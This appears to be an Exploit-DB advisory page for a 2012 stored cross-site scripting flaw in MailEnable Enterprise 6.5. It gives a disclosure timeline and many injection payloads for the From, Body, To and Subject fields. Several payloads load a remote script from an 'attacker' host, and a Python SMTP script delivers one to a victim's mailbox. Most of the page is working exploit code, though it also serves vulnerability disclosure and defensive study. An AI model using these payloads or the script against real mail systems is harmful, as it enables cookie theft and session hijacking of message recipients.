MailEnable Enterprise 6.5 XSS Vulnerability

vendor:

MailEnable Enterprise

by:

loneferret

7,5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: MailEnable Enterprise

Affected Version From: 6.5

Affected Version To: 6.5

Patch Exists: YES

Related CWE: N/A

CPE: a:mailenable:mailenable_enterprise:6.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Server 2003 SP2, Windows 7 Pro SP1 (x86)

2012

MailEnable Enterprise 6.5 XSS Vulnerability

MailEnable Enterprise 6.5 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'From', 'Body', 'To' and 'Subject' fields of an email message. This code will be executed when the message is viewed by the recipient. The malicious code can be used to steal cookies, hijack sessions, and redirect users to malicious websites.

Mitigation:

MailEnable Enterprise 6.5 should be upgraded to the latest version to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: MailEnable Enterprise
Version: 6.5
Vendor Site: http://www.mailenable.com
Software Download: http://www.mailenable.com/download.asp

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9


Injection Point: From
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

Injection Point: Body
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

Injection Point: To
Injection Payload(s):
1: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
2: </TITLE><SCRIPT>alert("XSS");</SCRIPT>

Injection Point: Subject
Injection Payload(s):
1: <SCRIPT>alert('XSS')</SCRIPT>
2: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
3: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
4: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
5: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
6: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
7: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
8: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
9: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
10: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT>
11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
12: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT>
13: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
14: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
15: <<SCRIPT>alert("XSS");//<</SCRIPT>
16: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

'''


#!/usr/bin/python
import smtplib, urllib2

payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""

def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: XSS" + payload + "\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS.\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()

username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)